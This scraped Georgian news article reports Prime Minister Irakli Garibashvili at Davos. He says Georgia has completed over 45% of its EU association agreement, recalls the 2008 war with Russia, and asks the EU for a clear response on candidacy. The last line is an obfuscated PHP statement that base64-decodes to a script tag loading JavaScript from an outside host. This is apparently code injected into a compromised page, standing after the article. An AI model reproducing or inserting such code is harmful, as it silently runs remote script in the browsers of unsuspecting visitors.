celsiusi
ავერსი საქკაბელი
საქართველოს პრემიერ–მინისტრი ირაკლი ღარიბაშვილი დავოსში მიმდინარე დისკუსიაში მონაწილეობს. 
 
პრემიერის განცხადებით, ასოცირების ხელშეკრულების 45 პროცენტი ქვეყანას უკვე შესრულებული აქვს და ახლა გადაწყვეტილება ევროკავშირზეა. 
 
"მხედველობაში უნდა მივიღოთ ქართველი ხალხის მოსაზრება, 80%-ზე მეტი მხარს უჭერს იდეას, რომ საქართველო გახდეს ევროპული ოჯახის წევრი. მინდა კიდევ ერთხელ ავღნიშნო, რომ ეს არამხოლოდ მთავრობის, არამედ მოსახლეობის არჩევანია. საუკუნეების მანძილზე ჩვენ ვცდილობდით ევროკავშირთან ახლოს მისვლას, ჩვენ ეს პროცესი არ დაგვიწყია ასოცირების ხელშეკრულებაზე ხელის მოწერიდან, ვცდილობდით გავმხდარიყავით ცივილური ევროპული ოჯახის წევრი. ახლა უკვე უნდა დავაორგანიზოთ ქართველი ხალხის არჩევანი, გვჯერა რომ ევროპული ღირებულებების მიმართ ძალიან ერთგული ვართ. ასევე, დემოკრატიული რეფორმების მიმართ.
 
ჩვენ ასოცირების ხელშეკრულების 45%-ზე მეტი შევასრულეთ, გვაქვს ამბიციური დღის წესრიგი, ყველა მიმართულებით გაუმჯობესებას ვაჩვენებთ - იქნება ეს კანონის უზენაესობა თუ სასამართლო რეფორმები. ახლა საკითხი დგას შემდგომში, - როდის მიიღებს ქართველი ხალხი ერთგვარ სიმბოლურ, პოლიტიკურ დეკლარაციას და აღიარებას, რომ საქართველო არის ევროპული ოჯახის ნაწილი. არ უნდა ავუხსნათ რომ ახლა არ არის შესაბამისი დრო და აჯობებს, რომ ეს საკითხი მოგვიანებით განვიხილოთ. გვჭირდება ვნახოთ მოქმედება, რადგან ახლა განსხვავებული სამყაროა. რაც ხდება უკრაინაში - არ არის გამოწვევა მხოლოდ უკრაინის უსაფრთხოებისთვის, ეს არის გამოწვევა მთელი ევროპის უსაფრთხოების არქიტექტურისთვის, მინდა შეგახსენოთ ომი, რომელიც 2008 წელს მოხდა, მინდა წუხილი გამოვთქვა, რომ მაშინ ასეთი ერთიანობა ვერ ვნახეთ.
 
ჩვენ მივესალმებით ამ ერთიანობას. ეს დიდებული რამ არის, როგორც მთელი ცივილიზებული მსოფლიოს რეაქცია. მაგრამ ჩვენ - ქართველებმა ძალიან მაღალი საფასური გადავიხადეთ დამოუკიდებლობის აღდგენის შემდეგ. 90-იან წლებში ჩვენ გვქონდა 2 ომი: აფხაზეთსა და [სამხრეთ] ოსეთში, ასევე 2008 წელს ფართომასშტაბიანი ომი რუსეთთან. ამ ომის შედეგია ჩვენი ისტორიული ტერიტორიების დროებითი ოკუპაცია.
 
ჩვენ გვესმის ის ეჭვები, რომელიც არსებობს ევროკავშირში, რადგან, როგორც უკვე აღინიშნა, მათ არ სურთ ყველა ამ პრობლემის „იმპორტირება“ ევროკავშირში. ჩვენ ასევე გვესმის, რომ კანდიდატის სტატუსის მინიჭება არ ნიშნავს წევრობის მინიჭებას. ეს არის, როგორც ესტონეთის პრეზიდენტმა აღნიშნა, ხანგრძლივი პროცესი. ჩვენ ეს გვესმის. ჩვენ გვაქვს ჩვენი "საშინაო დავალება" ასოცირების ხელშეკრულების სახით.
ჩვენ გვჭირდება სიცხადე და რელევანტური, ადეკვატური რეაგირება ევროკავშირის მხრიდან.
 
ნება მომეცით, წარმოვთქვა ცნობილი ქართველი მეცნიერის, ევროპის კონსტიტუციის თანაავტორის, ბატონი მიხეილ მუსხელიშვილის ციტატა: "საქართველომ იცის, რომ მისი ადგილი ევროპაშია. ახლა კი ევროპამ უნდა გააკეთოს დასკვნები". ეს არის ჩემი დასკვნითი კომენტარი," - განაცხადა ღარიბაშვილმა.
603
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");